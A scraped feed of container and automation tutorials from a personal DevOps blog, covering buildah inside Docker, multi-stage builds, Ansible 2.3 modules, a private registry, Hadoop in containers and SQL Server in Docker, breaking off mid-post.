<p><strong>GoogLinux.com</strong>: Thoughts, stories and ideas to share :)</p>
<h1>Creating an OCI Container within a Docker Container</h1>
<p><em>Swapnil Jain · Docker, DevOps, OCI · Tue, 12 Sep 2017</em></p>
<p><img src="http://www.googlinux.com/content/images/2017/09/bloglaurel-docker-containerd.jpg" alt=""></p>
<p><strong><em>This title sounds funny, but I couldn't find a better one. :)</em></strong></p>
<p>With the release of the OCI 1.0 specification, it is no longer just the Docker container; it is now the Linux container. Tools are being built around the OCI specification, such as <code>buildah</code>, <code>cri-o</code> and <code>skopeo</code>, with a lot more to come.</p>
<p>I will be creating an Ubuntu container using Docker, and then creating an Alpine container within this Ubuntu container using <code>buildah</code> and <code>runc</code>. The fun part is that there is no Docker or OCI daemon running within the Ubuntu container.</p>
<blockquote>
<p><code>buildah</code> is a tool under Project Atomic which facilitates building OCI container images. <code>runc</code> is a CLI tool for spawning and running containers according to the OCI specification.</p>
</blockquote>
<pre><code>$ docker run -it --privileged -v libcon:/var/lib/containers/storage -v runcon:/var/run/containers/storage ubuntu bash
root@2faae578f9cf:/#
</code></pre>
<p>This will create a privileged Ubuntu container.
We are bypassing the container layer for the <code>/var/lib/containers/storage</code> and <code>/var/run/containers/storage</code> folders, as we would not be able to create another container layer on top of this layer.</p>
<p>Prior to installing <code>buildah</code>, I need to install some packages; use the following commands in the Ubuntu container.</p>
<pre><code>apt-get update
apt-get -y install software-properties-common
add-apt-repository -y ppa:alexlarsson/flatpak
add-apt-repository -y ppa:gophers/archive
apt-add-repository -y ppa:projectatomic/ppa
apt-get update
apt-get -y install bats btrfs-tools git libapparmor-dev libdevmapper-dev libglib2.0-dev libgpgme11-dev libostree-dev libseccomp-dev libselinux1-dev skopeo-containers go-md2man
apt-get -y install golang-1.8
</code></pre>
<p>Then, to build <code>buildah</code> on Ubuntu, follow these steps:</p>
<pre><code>mkdir ~/buildah
cd ~/buildah
export GOPATH=`pwd`
git clone https://github.com/projectatomic/buildah ./src/github.com/projectatomic/buildah
cd ./src/github.com/projectatomic/buildah
PATH=/usr/lib/go-1.8/bin:$PATH make runc all TAGS="apparmor seccomp"
make install
buildah --help
</code></pre>
<p><code>buildah</code> uses <code>runc</code> to run commands in a container, so we need to make sure <code>runc</code> is accessible.</p>
<pre><code>mkdir /etc/containers
cp ~/buildah/src/github.com/projectatomic/buildah/tests/policy.json /etc/containers/
cp ~/buildah/src/github.com/opencontainers/runc/runc /usr/local/bin/
</code></pre>
<h6 id="soitstimeforsomefuncreateanewworkingcontainerfromaspecifiedimage">So it's time for some fun. Create a new working container from a specified image.</h6>
<pre><code>root@2faae578f9cf:~# buildah from alpine
Getting image source signatures
Copying blob sha256:88286f41530e93dffd4b964e1db22ce4939fffa4a4c665dab8591fbab03d4926
 1.90 MiB / 1.90 MiB [=========================================================]
Copying config sha256:7328f6f8b41890597575cbaadc884e7386ae0acc53b747401ebce5cf0d624560
 0 B / 1.48 KiB [--------------------------------------------------------------]
Writing manifest to image destination
Storing signatures
 1.48 KiB / 1.48 KiB [=========================================================]
alpine-working-container
root@2faae578f9cf:~#
</code></pre>
<h6 id="listtheworkingcontainersandtheirbaseimages">List the working containers and their base images.</h6>
<pre><code>root@2faae578f9cf:~# buildah containers
CONTAINER ID  BUILDER  IMAGE ID      IMAGE NAME                       CONTAINER NAME
1f3daef44a3d     *     abf11ad2ca3c  docker.io/library/alpine:latest  alpine-working-container
root@2faae578f9cf:~#
</code></pre>
<h6 id="runacommandinsideofthecontainer">Run a command inside of the container.</h6>
<pre><code>root@2faae578f9cf:~# buildah run --tty alpine-working-container sh
/ # ps aux
PID   USER     TIME   COMMAND
    1 root       0:00 sh
    7 root       0:00 ps aux
/ # cat /etc/alpine-release
3.6.2
/ #
</code></pre>
<p>This has just started and there's a lot more to explore. Stay tuned. :)</p>
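<p>A natural next step, not covered in the session above, is turning the working container into a reusable image. The commands below are standard <code>buildah</code> subcommands; the image name <code>my-alpine</code> is just an example:</p>
<pre><code># commit the working container to a new local image (image name is an example)
buildah commit alpine-working-container my-alpine

# list local images to confirm the commit worked
buildah images

# clean up the working container once you are done with it
buildah rm alpine-working-container
</code></pre>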
<a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Docker: Multi-stage builds<p><img src="http://www.googlinux.com/content/images/2017/07/AAEAAQAAAAAAAAe1AAAAJDg2MzJhNmVmLTllMjktNGQ1YS05OWQ5LTYzODNjMDQ4NTU1Mg.jpg" alt=""></p> <p><strong><em>Multi-stage builds is a new feature in Docker 17.05, and they will be exciting to anyone who has struggled to optimise Dockerfiles while keeping them easy to read and maintain.</em></strong></p> <p>One of the most challenging things about building images is keeping the image size down. Each instruction in the</p>http://www.googlinux.com/docker-multi-stage-builds/05e853e1-70b6-4079-98d1-2ce70ad41c10DockerDevOpsSwapnil JainMon, 24 Jul 2017 14:38:03 GMT<p><img src="http://www.googlinux.com/content/images/2017/07/AAEAAQAAAAAAAAe1AAAAJDg2MzJhNmVmLTllMjktNGQ1YS05OWQ5LTYzODNjMDQ4NTU1Mg.jpg" alt=""></p> <p><strong><em>Multi-stage builds is a new feature in Docker 17.05, and they will be exciting to anyone who has struggled to optimise Dockerfiles while keeping them easy to read and maintain.</em></strong></p> <p>One of the most challenging things about building images is keeping the image size down. Each instruction in the Dockerfile adds a layer to the image, and you need to remember to clean up any artifacts you don’t need before moving on to the next layer. To write a really efficient Dockerfile, you have traditionally needed to employ shell tricks and other logic to keep the layers as small as possible and to ensure that each layer has the artifacts it needs from the previous layer and nothing else.</p> <h5 id="thisishowweusedtodo">This is how we used to do...</h5> <p>This is a simple go app to print "Hello Docker!".</p> <pre><code>[root@node1 multistage]# cat app.go package main import "fmt" func main() { fmt.Println("Hello Docker!") } </code></pre> <p>And heres our <code>Dockerfile</code> to build and run this application.</p> <pre><code>[root@node1 multistage]# cat Dockerfile FROM golang:1.7.3 COPY app.go . RUN go build -o app app.go CMD ["./app"] root@ubuntu:~/multistage# </code></pre> <p>Lets build this</p> <pre><code>[root@node1 multistage]# docker build . -t mygoapp Sending build context to Docker daemon 3.072kBStep 1/4 : FROM golang:1.7.3 1.7.3: Pulling from library/golang 386a066cd84a: Pull complete 75ea84187083: Pull complete 88b459c9f665: Pull complete a31e17eb9485: Pull complete 457559cc1d69: Pull complete 47fe51a74a06: Pull complete 08dacccac43c: Pull complete Digest: sha256:340212e9c5d062f3bfe58ff02768da70234ea734bd022a357ee6be2a6d963505Status: Downloaded newer image for golang:1.7.3 ---&gt; ef15416724f6Step 2/4 : COPY app.go . ---&gt; c50e64d59b04 Removing intermediate container 8198404914c9 Step 3/4 : RUN go build -o app app.go ---&gt; Running in 685898ecf74f ---&gt; 739f7b2a47c7 Removing intermediate container 685898ecf74f Step 4/4 : CMD ./app ---&gt; Running in 66334e6ca5d8 ---&gt; ab1152b774ee Removing intermediate container 66334e6ca5d8 Successfully built ab1152b774ee Successfully tagged mygoapp:latest [root@node1 multistage]# [root@node1 multistage]# docker run mygoapp Hello Docker! 
[root@node1 multistage]#
</code></pre>
<p>Check the size of the image: it's 674MB.</p>
<pre><code>[root@node1 multistage]# docker image ls
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
mygoapp             latest              efdc2b679aa6        15 seconds ago      674MB
golang              1.7.3               ef15416724f6        8 months ago        672MB
[root@node1 multistage]#
</code></pre>
<h5 id="thisishowwewouldlovetodo">This is how we would love to do it...</h5>
<p>With multi-stage builds, you use multiple <code>FROM</code> statements in your <code>Dockerfile</code>. Each <code>FROM</code> instruction can use a different base, and each of them begins a new stage of the build. You can selectively copy artifacts from one stage to another, leaving behind everything you don't want in the final image. To show how this works, let's adapt the <code>Dockerfile</code> from the previous section to use multi-stage builds.</p>
<pre><code>[root@node1 multistage]# cat Dockerfile.multi
FROM golang:1.7.3 AS builder
COPY app.go .
RUN go build -o app app.go

FROM alpine:latest
COPY --from=builder /go/app .
CMD ["./app"]
</code></pre>
<p>You only need the single <code>Dockerfile</code>. You don't need a separate build script, either. Just run <code>docker build</code>.</p>
<pre><code>[root@node1 multistage]# docker build . -f Dockerfile.multi -t mygoapp:multi
Sending build context to Docker daemon  4.096kB
Step 1/6 : FROM golang:1.7.3 AS builder
 ---&gt; ef15416724f6
Step 2/6 : COPY app.go .
 ---&gt; Using cache
 ---&gt; 15f89542f308
Step 3/6 : RUN go build -o app app.go
 ---&gt; Using cache
 ---&gt; 09d91ef7f1a1
Step 4/6 : FROM alpine:latest
latest: Pulling from library/alpine
88286f41530e: Pull complete
Digest: sha256:1072e499f3f655a032e88542330cf75b02e7bdf673278f701d7ba61629ee3ebe
Status: Downloaded newer image for alpine:latest
 ---&gt; 7328f6f8b418
Step 5/6 : COPY --from=builder /go/app .
 ---&gt; adee51a03a34
Removing intermediate container de57adb9658f
Step 6/6 : CMD ./app
 ---&gt; Running in 42c17df73436
 ---&gt; 40b371535a83
Removing intermediate container 42c17df73436
Successfully built 40b371535a83
Successfully tagged mygoapp:multi
[root@node1 multistage]#
</code></pre>
<p>The second <code>FROM</code> instruction starts a new build stage with the <code>alpine:latest</code> image as its base. The <code>COPY --from=builder</code> line copies just the built artifact from the previous stage into this new stage. The Go SDK and any intermediate artifacts are left behind, and not saved in the final image. The end result is a tiny production image.</p>
<pre><code>[root@node1 multistage]# docker image ls
REPOSITORY          TAG                 IMAGE ID            CREATED              SIZE
mygoapp             multi               40b371535a83        About a minute ago   5.6MB
mygoapp             latest              efdc2b679aa6        5 minutes ago        674MB
alpine              latest              7328f6f8b418        3 weeks ago          3.97MB
golang              1.7.3               ef15416724f6        8 months ago         672MB
[root@node1 multistage]#
</code></pre>
<p>Notice the difference in size. :)</p>
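<p>The slim image runs exactly like the fat one; a quick check is sketched below. One caveat worth adding, which is not from the original post: this trivial program produces a static binary, but a Go program that pulls in cgo (for example via the <code>net</code> package) may fail against Alpine's musl libc, and forcing a static build in the builder stage avoids that.</p>
<pre><code># run the multi-stage image to confirm the binary works on Alpine
docker run mygoapp:multi

# if your app uses cgo, disable it in the builder stage instead:
#   RUN CGO_ENABLED=0 go build -o app app.go
</code></pre>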
<h1>Ansible 2.3: New Modules</h1>
<p><em>Swapnil Jain · Ansible, DevOps · Mon, 17 Apr 2017</em></p>
<p><img src="http://www.googlinux.com/content/images/2017/04/Ansible-2-3-Blog-Header.png" alt=""></p>
<p><strong><em>Soon after Ansible turned five, version 2.3 was released. There are a lot of new features in this version, specifically related to networking: the persistent connections framework, the network_cli connection plugin and the netconf connection plugin.</em></strong></p>
<p>There are 280+ new modules available in Ansible 2.3. Below is a list of some exciting new modules which can help you automate certain tasks and also decorate your playbooks.</p>
<ul>
<li><code>archive</code> - Creates a compressed archive of one or more files or trees.</li>
</ul>
<pre><code>- archive:
    path: /path/to/foo
    dest: /path/to/foo.tgz
    format: gz
</code></pre>
<blockquote>
<p><mark>gz, bz2 &amp; zip are supported formats</mark></p>
</blockquote>
<ul>
<li><code>openssl_privatekey</code> - Generate OpenSSL private keys.</li>
</ul>
<pre><code>- openssl_privatekey:
    path: /etc/ssl/private/googlinux.com.pem
    size: 2048
    type: DSA
</code></pre>
<ul>
<li><code>openssl_publickey</code> - Generate an OpenSSL public key from its private key.</li>
</ul>
<pre><code>- openssl_publickey:
    path: /etc/ssl/public/googlinux.com.pem
    privatekey_path: /etc/ssl/private/googlinux.com.pem
</code></pre>
<ul>
<li><code>openssl_csr</code> - Generate an OpenSSL Certificate Signing Request (CSR).</li>
</ul>
<pre><code>- openssl_csr:
    path: /etc/ssl/csr/www.googlinux.com.csr
    privatekey_path: /etc/ssl/private/googlinux.com.pem
    common_name: www.googlinux.com
</code></pre>
<ul>
<li><code>pacemaker_cluster</code> - Manage a Pacemaker cluster.</li>
</ul>
<pre><code>- name: Set cluster Online
  hosts: localhost
  gather_facts: no
  tasks:
    - name: get cluster state
      pacemaker_cluster: state=online
</code></pre>
<ul>
<li><code>parted</code> - Configure block device partitions.</li>
</ul>
<pre><code>- parted: device=/dev/sdb unit=MiB state=info
  register: sdb_info

- parted:
    device: /dev/sdb
    number: "{{ item.num }}"
    state: absent
  with_items:
    - "{{ sdb_info.partitions }}"
</code></pre>
<ul>
<li><code>wait_for_connection</code> - Waits until the remote system is reachable/usable. This is a better alternative to the <code>wait_for</code> module.</li>
</ul>
<pre><code>- name: Wait 600 seconds for target connection to become reachable/usable
  wait_for_connection:

- name: Wait 300 seconds, but only start checking after 60 seconds
  wait_for_connection:
    delay: 60
    timeout: 300
</code></pre>
<h5 id="ansibletowercanalsobemanagedusingaplaybookbelowaresomemodulesforansibletower">Ansible Tower can also be managed using a playbook :). Below are some modules for Ansible Tower.</h5>
<ul>
<li><code>tower_credential</code> - Create, update, or destroy an Ansible Tower credential.</li>
<li><code>tower_group</code> - Create, update, or destroy an Ansible Tower group.</li>
<li><code>tower_host</code> - Create, update, or destroy an Ansible Tower host.</li>
<li><code>tower_inventory</code> - Create, update, or destroy an Ansible Tower inventory.</li>
<li><code>tower_job_cancel</code> - Cancel an Ansible Tower job.</li>
<li><code>tower_job_launch</code> - Launch an Ansible job.</li>
<li><code>tower_job_list</code> - List Ansible Tower jobs.</li>
<li><code>tower_job_template</code> - Create, update, or destroy an Ansible Tower job template.</li>
<li><code>tower_job_wait</code> - Wait for an Ansible Tower job to finish.
</li> <li><code>tower_label</code> - create, update, or destroy Ansible Tower label.</li> <li><code>tower_organization</code> - create, update, or destroy Ansible Tower organizations</li> <li><code>tower_project</code> - create, update, or destroy Ansible Tower projects</li> <li><code>tower_role</code> - create, update, or destroy Ansible Tower role. </li> <li><code>tower_team</code> - create, update, or destroy Ansible Tower team.</li> <li><code>tower_user</code> - create, update, or destroy Ansible Tower user.</li> </ul> <h5 id="lotofnewadditionsforwindowsaswell">Lot of new additions for Windows ^ ^ as well :)</h5> <ul> <li><code>win_disk_image</code> - Manage ISO/VHD/VHDX mounts on Windows hosts</li> <li><code>win_dns_client</code> - Configures DNS lookup on Windows hosts</li> <li><code>win_domain</code> - Ensures the existence of a Windows domain. </li> <li><code>win_domain_controller</code> - Manage domain controller/member server state for a Windows host</li> <li><code>win_domain_membership</code> - Manage domain/workgroup membership for a Windows host</li> <li><code>win_find</code> - return a list of files based on specific criteria </li> <li><code>win_msg</code> - Sends a message to logged in users on Windows hosts.</li> <li><code>win_path</code> - Manage Windows path environment variables</li> <li><code>win_psexec</code> - Runs commands (remotely) as another (privileged) user</li> <li><code>win_reg_stat</code> - returns information about a Windows registry key or property of a key</li> <li><code>win_region</code> - Set the region and format settings</li> <li><code>win_say</code> - Text to speech module for Windows to speak messages</li> <li><code>win_shortcut</code> - Manage shortcuts on Windows</li> <li><code>win_tempfile</code> - Creates temporary files and directories</li> </ul> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Ansible: Run play only on reachable host<p><img src="http://www.googlinux.com/content/images/2017/03/do407singapore.jpg" alt=""></p> <p>During one of my Ansible trainings in Singapore one candidate asked me, is there some way that we execute the play only on reachable hosts. She also insisted that the playbook should show no errors. Showing errors would report the Job as failed in Ansible Tower. So, finally we came</p>http://www.googlinux.com/ansible-run-play-only-on-reachable-host/58b836ed-5dd4-4585-92ed-cb7e7fb78967AnsibleDevOpsSwapnil JainThu, 23 Mar 2017 14:46:36 GMT<p><img src="http://www.googlinux.com/content/images/2017/03/do407singapore.jpg" alt=""></p> <p>During one of my Ansible trainings in Singapore one candidate asked me, is there some way that we execute the play only on reachable hosts. She also insisted that the playbook should show no errors. Showing errors would report the Job as failed in Ansible Tower. So, finally we came out with a solution and it worked really well. 
</p> <p><strong>Our First play would be to check reachable hosts, and create a new group of the reachable hosts.</strong></p> <pre><code>- name: check reachable hosts hosts: all gather_facts: no tasks: - command: ping -c1 {{ inventory_hostname }} delegate_to: localhost register: ping_result ignore_errors: yes - group_by: key=reachable when: ping_result|success </code></pre> <ul> <li>We use <code>command</code> module to ping a host and delegate the task to localhost</li> <li>using <code>group_by</code> module, if the host is reachable we add it to a new group called <code>reachable</code></li> </ul> <p><strong>Next play would be the one that you want to run only on reachable hosts.</strong></p> <pre><code>- name: your actual play hosts: reachable gather_facts: yes tasks: - debug: msg="this is {{ ansible_hostname }}" </code></pre> <p><em>happy ;)</em></p> <blockquote> <p>This playbook is also available on <a href="https://github.com/swapnil-linux/ansible/blob/master/play_on_reachable_host.yml">GitHub</a> </p> </blockquote> <hr> <p><em><mark>Like it? <a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Creating Private Docker Registry<p><img src="http://www.googlinux.com/content/images/2017/03/2016-21-07-private-containers.png" alt=""></p> <h2 id="aboutregistry">About Registry</h2> <p><strong><em>A registry is a repository of docker images. Docker by default points to Public Docker Registry which is also called as Docker Hub. <code>docker search</code> would list results from docker hub and more information about image is available on hub.docker.com</em></strong></p> <p>You can upload your docker images</p>http://www.googlinux.com/creating-private-docker-registry/4c514237-e0dc-42e3-90a9-e14b7ba5504fDockerDevOpsSwapnil JainWed, 08 Mar 2017 00:55:07 GMT<p><img src="http://www.googlinux.com/content/images/2017/03/2016-21-07-private-containers.png" alt=""></p> <h2 id="aboutregistry">About Registry</h2> <p><strong><em>A registry is a repository of docker images. Docker by default points to Public Docker Registry which is also called as Docker Hub. <code>docker search</code> would list results from docker hub and more information about image is available on hub.docker.com</em></strong></p> <p>You can upload your docker images on Docker Hub which would be available for public. 
<h1>Creating Private Docker Registry</h1>
<p><em>Swapnil Jain · Docker, DevOps · Wed, 08 Mar 2017</em></p>
<p><img src="http://www.googlinux.com/content/images/2017/03/2016-21-07-private-containers.png" alt=""></p>
<h2 id="aboutregistry">About Registry</h2>
<p><strong><em>A registry is a repository of Docker images. Docker by default points to the public Docker registry, which is also called Docker Hub. <code>docker search</code> lists results from Docker Hub, and more information about each image is available on hub.docker.com.</em></strong></p>
<p>You can upload your Docker images to Docker Hub, where they are available to the public. You can also create your own registry if you don't want to make your images public, or if you want a registry on your own premises, available privately to your organisation or development environment.</p>
<h2 id="createregistry">Create Registry</h2>
<p>This one-liner will deploy your own private Docker registry.</p>
<pre><code>docker run --name=docker-registry -d -v /opt/registry:/var/lib/registry:Z -p 5000:5000 registry
</code></pre>
<ul>
<li><code>-d</code> : will daemonize the container.</li>
<li><code>-v /opt/registry:/var/lib/registry:Z</code> : will make the <code>/var/lib/registry</code> folder persistent on your host at <code>/opt/registry</code>, and <code>:Z</code> will set the appropriate SELinux context on <code>/opt/registry</code>.</li>
<li><code>-p 5000:5000</code> : will forward port 5000 from your host to port 5000 of your registry container.</li>
</ul>
<p><img src="http://www.googlinux.com/content/images/2017/03/Screenshot-2017-03-08-18-31-41.png" alt=""></p>
<blockquote>
<p>Note: This registry uses v2 APIs, so you will have to use Docker version 1.6.0+ to pull and push images.</p>
</blockquote>
<h2 id="testit">Test It</h2>
<h4 id="createadockerfilewiththebelowcontent">Create a <code>Dockerfile</code> with the below content</h4>
<pre><code>FROM docker.io/library/alpine
CMD ["echo","Hello World!"]
</code></pre>
<h4 id="buildyourimageusingdockerbuild">Build your image using <code>docker build</code></h4>
<pre><code>[root@localhost ~]# docker build -t localhost:5000/hello .
Sending build context to Docker daemon 2.048 kB
Step 1 : FROM docker.io/library/alpine
 ---&gt; 4a415e366388
Step 2 : CMD echo Hello World!
 ---&gt; Running in bda8cb469d6a
 ---&gt; 9d586b88dd82
Removing intermediate container bda8cb469d6a
Successfully built 9d586b88dd82
</code></pre>
<h4 id="letspushitusingdockerpush">Let's push it using <code>docker push</code></h4>
<pre><code>[root@localhost ~]# docker push localhost:5000/hello
The push refers to a repository [localhost:5000/hello]
23b9c7b43573: Pushed
latest: digest: sha256:84767a295c57bfd0a43072240790f105b192d60fbd836cb1df12badb3a1b4cf0 size: 528
</code></pre>
<p>We created persistent storage for our registry folder, so you can see the pushed image under /opt/registry on the host.</p>
<pre><code>[root@localhost ~]# ls -l /opt/registry/docker/registry/v2/repositories/
total 0
drwxr-xr-x. 5 root root 52 Mar  8 08:09 hello
</code></pre>
<p>That's it :)</p>
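<p>As a final sanity check, you could pull the image back out of the new registry and run it; a quick sketch using the image we just pushed:</p>
<pre><code># pull the image from the private registry and run it
docker pull localhost:5000/hello
docker run localhost:5000/hello   # should print: Hello World!
</code></pre>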
<h1>Quickly deploy hadoop cluster using Docker</h1>
<p><em>Swapnil Jain · Docker, DevOps, Hadoop · Thu, 12 Jan 2017</em></p>
<p><img src="http://www.googlinux.com/content/images/2017/01/linux-hadoop-docker.png" alt=""></p>
<p>The Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage.</p>
<p><strong><em>Installing, configuring and adding new datanodes to a Hadoop cluster takes time. Deploying Hadoop nodes as containers can be really quick. <mark>On a CentOS 7 VM in VirtualBox, it took 9 seconds to bring up 1 YarnMaster, 1 NameNode and 3 DataNodes. Yes, just 9 seconds.</mark> The steps below demonstrate how to quickly deploy a Hadoop cluster using Docker.</em></strong></p>
<p><img src="http://www.googlinux.com/content/images/2017/01/Screenshot-2017-01-12-11-43-31.png" alt=""></p>
<h3 id="pulldockerimages">Pull Docker Images</h3>
<p>These Docker images are built using CentOS 7 and Cloudera CDH 5.9.</p>
<pre><code>~# docker pull swapnillinux/cloudera-hadoop-namenode
~# docker pull swapnillinux/cloudera-hadoop-yarnmaster
~# docker pull swapnillinux/cloudera-hadoop-datanode
</code></pre>
<h3 id="createadockerbridgednetwork">Create a Docker Bridged Network</h3>
<p>This step is optional, but I strongly recommend creating a separate network for the Hadoop cluster.</p>
<pre><code>~# docker network create hadoop
</code></pre>
<h3 id="createyarnmaster">Create Yarnmaster</h3>
<pre><code>~# docker run -d --net hadoop --net-alias yarnmaster --name yarnmaster -h yarnmaster -p 8032:8032 -p 8088:8088 swapnillinux/cloudera-hadoop-yarnmaster
</code></pre>
<h3 id="createnamenode">Create Namenode</h3>
<pre><code>~# docker run -d --net hadoop --net-alias namenode --name namenode -h namenode -p 8020:8020 swapnillinux/cloudera-hadoop-namenode
</code></pre>
<h3 id="createfirstdatanode">Create First Datanode</h3>
<pre><code>~# docker run -d --net hadoop --net-alias datanode1 -h datanode1 --name datanode1 --link namenode --link yarnmaster swapnillinux/cloudera-hadoop-datanode
</code></pre>
<h3 id="creatingadditionaldatanodes">Creating additional Datanodes</h3>
<p>You can keep adding datanodes; just change <code>--net-alias datanodeN</code>, <code>-h datanodeN</code> and <code>--name datanodeN</code>. (A shell loop for this appears at the end of this post.)</p>
<pre><code>~# docker run -d --net hadoop --net-alias datanode2 -h datanode2 --name datanode2 --link namenode --link yarnmaster swapnillinux/cloudera-hadoop-datanode
</code></pre>
<h3 id="verify">Verify</h3>
<p>Open your browser pointing to <code>http://docker-host-ip:8088</code> and click on <mark><strong>Nodes</strong></mark>.</p>
<blockquote>
<p>Replace <code>docker-host-ip</code> with the IP address of the Linux box where you are running these containers.</p>
</blockquote>
<p><img src="http://www.googlinux.com/content/images/2017/01/Screenshot-2017-01-12-12-25-48.png" alt=""></p>
<h3 id="runatest">Run A Test</h3>
<p><strong>Log in to the Namenode</strong></p>
<pre><code>[root@centos ~]# docker exec -it namenode bash
[root@namenode /]# hadoop version
Hadoop 2.6.0-cdh5.9.0
Subversion http://github.com/cloudera/hadoop -r 1c8ae0d951319fea693402c9f82449447fd27b07
Compiled by jenkins on 2016-10-21T08:10Z
Compiled with protoc 2.5.0
From source with checksum 5448863f1e597b97d9464796b0a451
This command was run using /usr/lib/hadoop/hadoop-common-2.6.0-cdh5.9.0.jar
[root@namenode /]#
</code></pre>
<p><strong>Run a Pi calculation test</strong></p>
<pre><code>[root@namenode /]# hadoop jar /usr/lib/hadoop-mapreduce/hadoop-mapreduce-examples.jar pi 10 10
Number of Maps  = 10
Samples per Map = 10
Wrote input for Map #0
Wrote input for Map #1
Wrote input for Map #2
Wrote input for Map #3
Wrote input for Map #4
Wrote input for Map #5
Wrote input for Map #6
Wrote input for Map #7
Wrote input for Map #8
Wrote input for Map #9
Starting Job
17/01/12 07:00:49 INFO client.RMProxy: Connecting to ResourceManager at yarnmaster/172.18.0.3:8032
17/01/12 07:00:50 INFO input.FileInputFormat: Total input paths to process : 10
17/01/12 07:00:50 INFO mapreduce.JobSubmitter: number of splits:10
17/01/12 07:00:50 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1484201581901_0001
17/01/12 07:00:51 INFO impl.YarnClientImpl: Submitted application application_1484201581901_0001
17/01/12 07:00:51 INFO mapreduce.Job: The url to track the job: http://yarnmaster:8088/proxy/application_1484201581901_0001/
17/01/12 07:00:51 INFO mapreduce.Job: Running job: job_1484201581901_0001
17/01/12 07:01:04 INFO mapreduce.Job: Job job_1484201581901_0001 running in uber mode : false
17/01/12 07:01:04 INFO mapreduce.Job:  map 0% reduce 0%
17/01/12 07:01:36 INFO mapreduce.Job:  map 10% reduce 0%
17/01/12 07:01:38 INFO mapreduce.Job:  map 20% reduce 0%
17/01/12 07:01:58 INFO mapreduce.Job:  map 20% reduce 7%
17/01/12 07:02:05 INFO mapreduce.Job:  map 50% reduce 7%
17/01/12 07:02:06 INFO mapreduce.Job:  map 60% reduce 7%
17/01/12 07:02:07 INFO mapreduce.Job:  map 100% reduce 20%
17/01/12 07:02:09 INFO mapreduce.Job:  map 100% reduce 100%
17/01/12 07:02:09 INFO mapreduce.Job: Job job_1484201581901_0001 completed successfully
17/01/12 07:02:10 INFO mapreduce.Job: Counters: 49
        File System Counters
                FILE: Number of bytes read=226
                FILE: Number of bytes written=1300574
                FILE: Number of read operations=0
                FILE: Number of large read operations=0
                FILE: Number of write operations=0
                HDFS: Number of bytes read=2620
                HDFS: Number of bytes written=215
                HDFS: Number of read operations=43
                HDFS: Number of large read operations=0
                HDFS: Number of write operations=3
        Job Counters
                Launched map tasks=10
                Launched reduce tasks=1
                Data-local map tasks=10
                Total time spent by all maps in occupied slots (ms)=528262
                Total time spent by all reduces in occupied slots (ms)=30384
                Total time spent by all map tasks (ms)=528262
                Total time spent by all reduce tasks (ms)=30384
                Total vcore-seconds taken by all map tasks=528262
                Total vcore-seconds taken by all reduce tasks=30384
                Total megabyte-seconds taken by all map tasks=540940288
                Total megabyte-seconds taken by all reduce tasks=31113216
        Map-Reduce Framework
                Map input records=10
                Map output records=20
                Map output bytes=180
                Map output materialized bytes=280
                Input split bytes=1440
                Combine input records=0
                Combine output records=0
                Reduce input groups=2
                Reduce shuffle bytes=280
                Reduce input records=20
                Reduce output records=0
                Spilled Records=40
                Shuffled Maps =10
                Failed Shuffles=0
                Merged Map outputs=10
                GC time elapsed (ms)=6213
                CPU time spent (ms)=4740
                Physical memory (bytes) snapshot=2266828800
                Virtual memory (bytes) snapshot=28556414976
                Total committed heap usage (bytes)=1741398016
        Shuffle Errors
                BAD_ID=0
                CONNECTION=0
                IO_ERROR=0
                WRONG_LENGTH=0
                WRONG_MAP=0
                WRONG_REDUCE=0
        File Input Format Counters
                Bytes Read=1180
        File Output Format Counters
                Bytes Written=97
Job Finished in 81.108 seconds
Estimated value of Pi is 3.20000000000000000000
[root@namenode /]#
</code></pre>
<p><img src="http://www.googlinux.com/content/images/2017/01/Screenshot-2017-01-12-12-32-23.png" alt=""></p>
<p>Enjoy :)</p>
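<p>As promised above, if you want a bigger cluster, the datanode commands follow a fixed pattern, so a small shell loop can add several datanodes at once. A sketch following the same pattern; adjust the range to taste:</p>
<pre><code># add datanode3..datanode5 in one go
for i in 3 4 5; do
  docker run -d --net hadoop --net-alias datanode$i -h datanode$i --name datanode$i \
    --link namenode --link yarnmaster swapnillinux/cloudera-hadoop-datanode
done
</code></pre>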
<a href="https://twitter.com/intent/tweet?text=@jswapnil%20%23googlinux">Click here to Tweet</a> your feedback</mark></em></p>Microsoft SQL Server as a Docker Container<p><img src="http://www.googlinux.com/content/images/2017/03/sql-server-on-linux.png" alt=""></p> <p><strong><em>Nobody could have ever imagined Microsoft SQL Server running on Linux. I appreciate the foresight of Satya Nadella, CEO Microsoft embracing Linux and OpenSource.</em></strong></p> <p>Now as Microsoft SQL Server vNext CTP 1.1 is available for Ubuntu, RHEL7 &amp; CentOS7, how about running it as a container.</p> <p>To run SQL</p>http://www.googlinux.com/microsoft-sql-server-as-a-docker-container/0f194839-c8b3-4ee8-bb28-f5ec303b17f8DockerDevOpsSwapnil JainWed, 21 Dec 2016 13:32:27 GMT<p><img src="http://www.googlinux.com/content/images/2017/03/sql-server-on-linux.png" alt=""></p> <p><strong><em>Nobody could have ever imagined Microsoft SQL Server running on Linux. I appreciate the foresight of Satya Nadella, CEO Microsoft embracing Linux and OpenSource.</em></strong></p> <p>Now as Microsoft SQL Server vNext CTP 1.1 is available for Ubuntu, RHEL7 &amp; CentOS7, how about running it as a container.</p> <p>To run SQL Server vNext CTP 1.1, you need Minimum of 4 GB of RAM on your host.</p> <p><strong>Pulling Image</strong></p> <p>Use Docker pull command to pull the image from docker hub.</p> <pre><code>~# docker pull swapnillinux/mssql </code></pre> <p><strong>Creating Container</strong></p> <ul> <li>run - create &amp; start container</li> <li>--name - name the container as <code>mymssql</code></li> <li>-p 1433:1433 - forward port 1433 from your host to 1433 of container</li> <li>-d - Run container in background using Docker image <code>swapnillinux/mssql</code></li> </ul> <pre><code>~# docker run --name=mymssql -p 1433:1433 -d swapnillinux/mssql </code></pre> <p>Check Status using <code>docker ps</code> command</p> <pre><code>~# docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES ec4b65b5d6ec swapnillinux/mssql "/opt/mssql/bin/sqlse" 22 seconds ago Up 21 seconds 0.0.0.0:1433-&gt;1433/tcp mymssql </code></pre> <p>Check some 